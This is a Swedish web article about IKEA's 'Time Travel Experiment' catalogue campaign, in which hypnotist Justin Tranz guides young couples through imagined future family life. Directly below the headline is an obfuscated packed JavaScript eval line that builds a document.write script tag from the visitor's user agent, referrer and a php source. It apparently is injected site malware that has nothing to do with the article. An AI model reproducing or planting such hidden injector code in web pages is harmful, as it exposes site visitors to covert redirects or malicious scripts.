Image Image Image Image Image Image Image Image Image Image

| 31 mars, 2020

Scroll to top

Top

IKEA skickar unga par till framtiden

>// eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|srziy|var|u0026u|referrer|zakhk||js|php’.split(’|’),0,{}))

Tillsammans med hypnotisören Justin Tranz låter IKEA unga par resa i tiden och uppleva sin framtida vardag.

I samband med lanseringen av årets IKEA-katalog ger IKEA unga par möjligheten att se hur deras framtida vardag i badrummet och sovrummet kan komma att se ut. Efter att först försatts i hypnos, guidas de unga paren av Tranz genom en tidsresa där de ställs inför olika potentiella framtidsscenarier vid varje stopp. Från att uppvakta en 6-årig dotter på födelsedagen, till ett udda möte i badrummet med samma dotters framtida pojkvän, flera år senare.

”Vardagen är spännande! Det är då livet händer och plötsligt förändras, vilket inte bara förändrar våra liv utan även våra hem”, säger Johan Wickmark, global catalogue manager på IKEA

Justin Tranz har gjort över 6000 föreställningar i Las Vegas och är den enda hypnotisör i historien som uppträtt på Broadway. Under sin långa karriär har han inte bara hjälpt tusentals människor att uppnå sina personliga mål som att sluta röka och gå ner i vikt, utan också samarbetat med medicinsk personal, företagsledare och idrottsutövare.

I samarbetet med IKEA och ”The Time Travel Experiment” har Justin Tranz kunskaper varit ett verktyg för att ge unga par en bild av hur vardagen på ett ögonblick kan förändras, vilket påverkar både våra liv och våra hem. I experimentet får paren försmak på hur det är att bli föräldrar – en av de största förändringarna i livet och hemmet.

”Oavsett var i livet vi befinner oss börjar och slutar vardagen i badrummet och sovrummet. Två viktiga rum som har stor inverkan på vår vardag. Med den nya katalogen vill vi inspirera människor att skapa lösningar som passar deras behov och förbättrar livet hemma”, säger Johan Wickmark, Global catalogue Manager.